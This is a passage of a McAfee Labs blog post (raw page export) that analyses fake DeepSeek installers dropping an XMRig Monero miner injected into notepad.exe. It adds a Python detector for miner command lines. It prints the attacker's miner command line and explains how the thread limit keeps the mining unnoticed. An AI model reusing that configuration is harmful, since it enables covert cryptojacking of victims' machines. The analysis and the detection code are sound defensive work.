New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"3\" data-aria-level=\"1\"><b><span 
data-contrast=\"auto\">-u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3: <\/span><\/b><span data-contrast=\"auto\">This is the wallet address where the mined cryptocurrency is sent.\u00a0<\/span><span data-ccp-props=\"{&quot;335559739&quot;:0}\">\u00a0<\/span><\/li>\n<\/ul>\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"1\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:1440,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"4\" data-aria-level=\"1\"><b><span data-contrast=\"auto\">&#8211;cpu-max-threads-hint=40<\/span><\/b><span data-contrast=\"auto\"> indicates the number of CPU threads used for mining. In this instance, 40% of the available threads will be used. This limit prevents the system from slowing down, and the mining will remain unnoticed.<\/span><span data-ccp-props=\"{&quot;335559739&quot;:0}\">\u00a0<\/span><\/li>\n<\/ul>\n<ul>\n<li data-leveltext=\"o\" data-font=\"Courier New\" data-listid=\"1\" data-list-defn-props=\"{&quot;335552541&quot;:1,&quot;335559685&quot;:1440,&quot;335559991&quot;:360,&quot;469769226&quot;:&quot;Courier New&quot;,&quot;469769242&quot;:[9675],&quot;469777803&quot;:&quot;left&quot;,&quot;469777804&quot;:&quot;o&quot;,&quot;469777815&quot;:&quot;hybridMultilevel&quot;}\" aria-setsize=\"-1\" data-aria-posinset=\"5\" data-aria-level=\"1\"><b><span data-contrast=\"auto\">No GPU Flags: <\/span><\/b><span data-contrast=\"auto\">Here, the GPU is not used in mining, which prevents any GPU detection tools from flagging the mining process.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<li><span class=\"TextRun SCXW251569880 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun 
SCXW251569880 BCX0\">Upon further analysis, <\/span><span class=\"NormalTextRun ContextualSpellingAndGrammarErrorV2Themed SCXW251569880 BCX0\">We<\/span><span class=\"NormalTextRun SCXW251569880 BCX0\"> noticed that it is used to mine <strong>*<\/strong><\/span><\/span><strong><span class=\"TextRun Underlined SCXW251569880 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"none\"><span class=\"NormalTextRun SCXW251569880 BCX0\" data-ccp-charstyle=\"Hyperlink\">Monero<\/span><\/span><\/strong><span class=\"TextRun SCXW251569880 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW251569880 BCX0\"> Cryptocurrency, and it <\/span><span class=\"NormalTextRun SCXW251569880 BCX0\">hasn&#8217;t<\/span><span class=\"NormalTextRun SCXW251569880 BCX0\"> been reported for any <\/span><span class=\"NormalTextRun SCXW251569880 BCX0\">scams<\/span><span class=\"NormalTextRun SCXW251569880 BCX0\"> yet.<\/span><\/span><span class=\"EOP SCXW251569880 BCX0\" data-ccp-props=\"{&quot;335559739&quot;:0}\">\u00a0<\/span><\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-209974\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.27.07-PM.png\" alt=\"\" width=\"1526\" height=\"650\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.27.07-PM.png 1526w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.27.07-PM-300x128.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.27.07-PM-1024x436.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.27.07-PM-768x327.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screenshot-2025-03-04-at-3.27.07-PM-205x87.png 205w\" sizes=\"auto, (max-width: 1526px) 100vw, 1526px\" \/><\/p>\n<p style=\"text-align: 
<em><strong>">
center;\"><em><strong><span class=\"TextRun MacChromeBold SCXW149430920 BCX0\" lang=\"EN-US\" xml:lang=\"EN-US\" data-contrast=\"auto\"><span class=\"NormalTextRun SCXW149430920 BCX0\">Figure 18: Wallet status for the captured wallet address<\/span><\/span><span class=\"EOP SCXW149430920 BCX0\" data-ccp-props=\"{&quot;335551550&quot;:2,&quot;335551620&quot;:2,&quot;335559739&quot;:0}\">\u00a0<\/span><\/strong><\/em><\/p>\n<h4 aria-level=\"5\"><span data-contrast=\"none\">Why Monero?<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:80,&quot;335559739&quot;:40}\">\u00a0<\/span><\/h4>\n<p><span data-contrast=\"auto\">The attacker deliberately mines Monero. Its ring signatures, stealth addresses and hidden transaction amounts make the movement of funds extremely difficult to trace, so the proceeds cannot be followed to a cash-out point the way a Bitcoin payment can be followed across the public ledger. 
That is why Monero is the coin of choice for cryptojacking campaigns such as this one.<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559731&quot;:720,&quot;335559739&quot;:0}\">\u00a0<\/span><\/p>\n<h2 aria-level=\"2\"><span data-contrast=\"none\">Appendix of Terms<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h2>\n<h3 aria-level=\"4\"><i><span data-contrast=\"none\">PowerShell<\/span><\/i><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:80,&quot;335559739&quot;:40}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">PowerShell is a cross-platform command-line shell and scripting language from Microsoft, used for task automation and configuration management on Windows, Linux and macOS. Because it is present on every modern Windows system and can download and run code with a single command, malware frequently uses it as a first-stage downloader and launcher.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<h3 aria-level=\"4\"><span data-contrast=\"none\">Cryptominer<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:80,&quot;335559739&quot;:40}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">A cryptominer is software or hardware that uses computing power to validate cryptocurrency transactions, secure decentralized networks and earn currency rewards, at the cost of CPU or GPU time and electricity.<\/span><i><span data-contrast=\"auto\"> In the context of malware,<\/span><\/i><span data-contrast=\"auto\"> a cryptominer is unauthorized software that covertly uses infected devices to mine cryptocurrency for the attacker, draining resources, slowing performance and raising energy costs while often remaining difficult to detect or remove.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<h3 
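aria-level=\"4\"><\/h3>\n<p><span data-contrast=\"auto\">The XMRig command line analysed above gives a defender concrete things to look for: a stratum pool host and port, a 95-character Monero address handed to -u, the donate-level and cpu-max-threads-hint flags, and all of it attached to notepad.exe. The Python below is an added example written for this post, not McAfee&#8217;s or XMRig&#8217;s code. It parses XMRig-style options out of a process command line, checks the -u value for the shape of a Monero address (length and base58 alphabet only, no checksum), matches the pool host against a small watchlist, and flags a Windows utility that is carrying mining options as a likely injection host. The pool watchlist beyond hashvault.pro, the trusted-image list and the sample process records are constructed for illustration; the notepad.exe record reuses the flags, pool and wallet shown in Figure 17.<\/span><\/p>

```python
'''Flag XMRig-style cryptominer command lines in Windows process telemetry.

Added example for this post, not McAfee or XMRig code. The option table follows
XMRig documented flags; the pool watchlist, the trusted-host list and the sample
process records are constructed (the notepad.exe record mirrors the options in
Figure 17, with the pool and wallet address quoted on this page).
'''
import shlex
from typing import Dict, List, Tuple

# Monero addresses use base58 without the ambiguous characters 0, O, I and l.
B58_ALPHABET = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkm'[:0] + '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'

# XMRig options that take a value, mapped to one canonical name.
XMRIG_VALUE_OPTS = {
    '-o': 'url', '--url': 'url', '-u': 'user', '--user': 'user',
    '-p': 'pass', '--pass': 'pass', '--donate-level': 'donate-level',
    '--cpu-max-threads-hint': 'cpu-max-threads-hint',
}
# hashvault.pro is the pool on this page; the others are further public Monero
# pools. An illustrative watchlist, not an exhaustive one.
KNOWN_POOLS = ('hashvault.pro', 'supportxmr.com', 'nanopool.org')
# Windows utilities that never legitimately carry mining options; mining flags
# on one of these mean the binary is hosting injected code (assumed list).
TRUSTED_HOST_IMAGES = {'notepad.exe', 'explorer.exe', 'svchost.exe', 'rundll32.exe'}


def parse_xmrig_args(cmdline: str) -> Dict[str, str]:
    '''Extract XMRig options given as --key=value, --key value or -o value.
    The first token (the image) is skipped; posix=False keeps backslashes.'''
    tokens = shlex.split(cmdline, posix=False)
    opts: Dict[str, str] = {}
    i = 1
    while i < len(tokens):
        key, _, val = tokens[i].partition('=')
        if key in XMRIG_VALUE_OPTS:
            if not val and i + 1 < len(tokens):
                i += 1
                val = tokens[i]
            opts[XMRIG_VALUE_OPTS[key]] = val
        i += 1
    return opts


def looks_like_monero_address(s: str) -> bool:
    '''Structural check only, no checksum: a standard address or subaddress is
    95 base58 chars starting with 4 or 8; an integrated address is 106 chars
    starting with 4.'''
    if not s or any(c not in B58_ALPHABET for c in s):
        return False
    return (len(s) == 95 and s[0] in '48') or (len(s) == 106 and s[0] == '4')


def miner_indicators(image: str, cmdline: str) -> List[str]:
    '''Return the cryptomining indicators present in one process record.'''
    opts = parse_xmrig_args(cmdline)
    found: List[str] = []
    url = opts.get('url', '')
    host = url.split('//')[-1].rsplit(':', 1)[0].lower()  # drop scheme and port
    if host and any(host == p or host.endswith('.' + p) for p in KNOWN_POOLS):
        found.append('known_pool:' + host)
    elif url:
        found.append('pool_url:' + url)
    # XMRig accepts <wallet>.<worker> or <wallet>+<difficulty> as the user.
    wallet = opts.get('user', '').split('.')[0].split('+')[0]
    if looks_like_monero_address(wallet):
        found.append('monero_wallet')
    if 'donate-level' in opts:
        found.append('xmrig_donate_level')
    if 'cpu-max-threads-hint' in opts:
        found.append('cpu_throttled')  # keeps the host responsive on purpose
    image_name = image.replace('\\', '/').rsplit('/', 1)[-1].lower()
    if found and image_name in TRUSTED_HOST_IMAGES:
        found.append('mining_args_in_' + image_name)
    return found


def is_cryptominer(image: str, cmdline: str) -> bool:
    '''Two independent indicators, so a lone -o or -u from an unrelated tool
    does not fire on its own.'''
    return len(miner_indicators(image, cmdline)) >= 2


# Constructed process records: (image path, command line).
SAMPLE_PROCESSES: List[Tuple[str, str]] = [
    ('C:\\Windows\\System32\\notepad.exe',
     'notepad.exe --donate-level 2 -o pool.hashvault.pro:443 '
     '-u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 '
     '--cpu-max-threads-hint=40'),
    ('C:\\Windows\\System32\\notepad.exe', 'notepad.exe C:\\Users\\alice\\notes.txt'),
    ('C:\\Tools\\backup.exe', 'backup.exe -o D:\\out -u alice --threads 4'),
]


def scan(records=SAMPLE_PROCESSES) -> List[Tuple[str, List[str]]]:
    '''Return (image, indicators) for every record judged to be a miner.'''
    return [(img, miner_indicators(img, cl)) for img, cl in records
            if is_cryptominer(img, cl)]


if __name__ == '__main__':
    for img, hits in scan():
        print(img + ': ' + ', '.join(hits))
```

<p><span data-contrast=\"auto\">Requiring two independent indicators keeps a lone -o or -u from an unrelated tool (the constructed backup.exe record) from firing, while the notepad.exe record trips five. On a real fleet the same logic runs over Sysmon event ID 1 or EDR process-creation telemetry, and a wallet-address match on a system utility is worth escalating on its own, since no legitimate tool passes a Monero address to notepad.exe.<\/span><\/p>\n<h3 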
aria-level=\"4\"><\/h3>\n<h3 aria-level=\"4\"><span data-contrast=\"none\">Process Injection<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:80,&quot;335559739&quot;:40}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">This is a term used to describe a technique where malware injects and overwrites legitimate processes in memory, thereby modifying their behavior to run malicious code and bypassing security measures. The target processes are typically trusted processes.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<h3 aria-level=\"4\"><\/h3>\n<h3 aria-level=\"4\"><i><span data-contrast=\"none\">C&amp;C<\/span><\/i><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:80,&quot;335559739&quot;:40}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">C&amp;C (Command and Control) is a communication channel used by attackers to remotely issue commands, coordinate activities, and data from compromised systems or networks.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<h3 aria-level=\"4\"><\/h3>\n<h3 aria-level=\"4\"><i><span data-contrast=\"none\">Persistence<\/span><\/i><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:80,&quot;335559739&quot;:40}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">This term<\/span> <span data-contrast=\"auto\">refers to the techniques that malware or an attacker uses to maintain long-term access to a compromised system, even after reboots, logouts, or security interventions. 
Persistence ensures that the malicious payload or backdoor stays active and ready to execute even after the system is restarted or the user attempts to remove it.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<h3 aria-level=\"4\"><i><span data-contrast=\"none\">Payload<\/span><\/i><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:80,&quot;335559739&quot;:40}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">In malware, the payload is the main malicious component delivered or executed once infection occurs. It carries out the attacker&#8217;s goal, whether data theft, system damage, resource hijacking (as with the cryptominer here) or unauthorized remote control.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<h3 aria-level=\"4\"><i><span data-contrast=\"none\">XMRig<\/span><\/i><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:80,&quot;335559739&quot;:40}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">XMRig is open-source cryptocurrency mining software used primarily to mine Monero. It was developed as a legitimate tool for miners to make efficient use of CPU and GPU resources. Because it is free, well maintained and takes its wallet and pool straight from the command line, it has also become the miner of choice for cryptojacking malware, which simply drops or downloads XMRig and runs it with the attacker&#8217;s wallet and pool, as in the sample analysed above.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<h3 aria-level=\"4\"><i><span data-contrast=\"none\">Monero<\/span><\/i><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:80,&quot;335559739&quot;:40}\">\u00a0<\/span><\/h3>\n<p><span data-contrast=\"auto\">Monero (XMR) is a privacy-focused cryptocurrency that prioritizes anonymity, security, and decentralization. 
Launched in April 2014, Monero is designed to provide untraceable and unlinkable transactions, making it difficult for outside parties to monitor or track the movement of funds on its blockchain. It runs on a decentralized, peer-to-peer network like Bitcoin, but with privacy protections enabled by default rather than offered as an option.<\/span><span data-ccp-props=\"{}\">\u00a0<\/span><\/p>\n<h3 aria-level=\"2\"><span data-contrast=\"none\">Indicators of Compromise (IoCs)<\/span><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:160,&quot;335559739&quot;:80}\">\u00a0<\/span><\/h3>\n<p><span data-ccp-props=\"{&quot;134245418&quot;:true,&quot;134245529&quot;:true}\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-full wp-image-210771\" src=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screen-Shot-2025-03-17-at-1.56.34-PM.png\" alt=\"\" width=\"1706\" height=\"1108\" srcset=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screen-Shot-2025-03-17-at-1.56.34-PM.png 1706w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screen-Shot-2025-03-17-at-1.56.34-PM-300x195.png 300w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screen-Shot-2025-03-17-at-1.56.34-PM-1024x665.png 1024w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screen-Shot-2025-03-17-at-1.56.34-PM-768x499.png 768w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screen-Shot-2025-03-17-at-1.56.34-PM-1536x998.png 1536w, https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/Screen-Shot-2025-03-17-at-1.56.34-PM-199x129.png 199w\" sizes=\"auto, (max-width: 1706px) 100vw, 1706px\" \/>\u00a0<\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Authored by Aayush Tyagi and M, Mohanasundaram\u00a0 *Bold = Term Defined in Appendix In this blog, we discuss how 
malware&#8230;<\/p>\n","protected":false},"author":695,"featured_media":210430,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[10661],"tags":[],"coauthors":[4136],"class_list":["post-209804","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-internet-security"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Look Before You Leap: Imposter DeepSeek Software Seek Gullible Users | McAfee Blog<\/title>\n<meta name=\"description\" content=\"Authored by Aayush Tyagi and M, Mohanasundaram\u00a0 *Bold = Term Defined in Appendix In this blog, we discuss how malware authors recently utilized a popular\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Look Before You Leap: Imposter DeepSeek Software Seek Gullible Users | McAfee Blog\" \/>\n<meta property=\"og:description\" content=\"Authored by Aayush Tyagi and M, Mohanasundaram\u00a0 *Bold = Term Defined in Appendix In this blog, we discuss how malware authors recently utilized a popular\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/\" \/>\n<meta property=\"og:site_name\" content=\"McAfee Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:published_time\" content=\"2025-03-17T07:00:41+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-03-17T20:57:34+00:00\" \/>\n<meta 
property=\"og:image\" content=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/300x200_Blog_Deepseek-Mobile-Phone.png\" \/>\n\t<meta property=\"og:image:width\" content=\"600\" \/>\n\t<meta property=\"og:image:height\" content=\"400\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"McAfee Labs\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@McAfee_Labs\" \/>\n<meta name=\"twitter:site\" content=\"@McAfee\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"McAfee Labs\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"12 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/\"},\"author\":{\"name\":\"McAfee Labs\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad\"},\"headline\":\"Look Before You Leap: Imposter DeepSeek Software Seek Gullible 
Users\",\"datePublished\":\"2025-03-17T07:00:41+00:00\",\"dateModified\":\"2025-03-17T20:57:34+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/\"},\"wordCount\":2339,\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/300x200_Blog_Deepseek-Mobile-Phone.png\",\"articleSection\":[\"Internet Security\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/\",\"name\":\"Look Before You Leap: Imposter DeepSeek Software Seek Gullible Users | McAfee Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/300x200_Blog_Deepseek-Mobile-Phone.png\",\"datePublished\":\"2025-03-17T07:00:41+00:00\",\"dateModified\":\"2025-03-17T20:57:34+00:00\",\"description\":\"Authored by Aayush Tyagi and M, Mohanasundaram\u00a0 *Bold = Term Defined in Appendix In this blog, we discuss how malware authors recently utilized a 
popular\",\"breadcrumb\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/#primaryimage\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/300x200_Blog_Deepseek-Mobile-Phone.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/300x200_Blog_Deepseek-Mobile-Phone.png\",\"width\":600,\"height\":400},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Blog\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Internet Security\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/internet-security\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Look Before You Leap: Imposter DeepSeek Software Seek Gullible Users\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"name\":\"McAfee Blog\",\"description\":\"Internet Security 
News\",\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\",\"name\":\"McAfee\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"width\":1286,\"height\":336,\"caption\":\"McAfee\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee\",\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.youtube.com\/McAfee\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/86f325fa6532a017d06d6b49a2f3b1ad\",\"name\":\"McAfee Labs\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/af947d76ffbef8521094b476cf8050c3\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2017\/07\/Social-Media-PF-Logo-Pic-300x300-2-96x96.jpg\",\"caption\":\"McAfee Labs\"},\"description\":\"McAfee Labs is one of the leading sources for threat research, threat intelligence, and cybersecurity thought leadership. 
See our blog posts below for more information.\",\"sameAs\":[\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee_Labs\"],\"url\":\"https:\/\/www.mcafee.com\/blogs\/author\/mcafee-labs\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Look Before You Leap: Imposter DeepSeek Software Seek Gullible Users | McAfee Blog","description":"Authored by Aayush Tyagi and M, Mohanasundaram\u00a0 *Bold = Term Defined in Appendix In this blog, we discuss how malware authors recently utilized a popular","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"en_US","og_type":"article","og_title":"Look Before You Leap: Imposter DeepSeek Software Seek Gullible Users | McAfee Blog","og_description":"Authored by Aayush Tyagi and M, Mohanasundaram\u00a0 *Bold = Term Defined in Appendix In this blog, we discuss how malware authors recently utilized a popular","og_url":"https:\/\/www.mcafee.com\/blogs\/internet-security\/deepseek-or-deep-threat-how-hackers-are-using-ai-hype-to-deliver-malware\/","og_site_name":"McAfee Blog","article_publisher":"https:\/\/www.facebook.com\/McAfee\/","article_author":"https:\/\/www.facebook.com\/McAfee\/","article_published_time":"2025-03-17T07:00:41+00:00","article_modified_time":"2025-03-17T20:57:34+00:00","og_image":[{"width":600,"height":400,"url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2025\/03\/300x200_Blog_Deepseek-Mobile-Phone.png","type":"image\/png"}],"author":"McAfee Labs","twitter_card":"summary_large_image","twitter_creator":"@McAfee_Labs","twitter_site":"@McAfee","twitter_misc":{"Written by":"McAfee Labs","Est. 
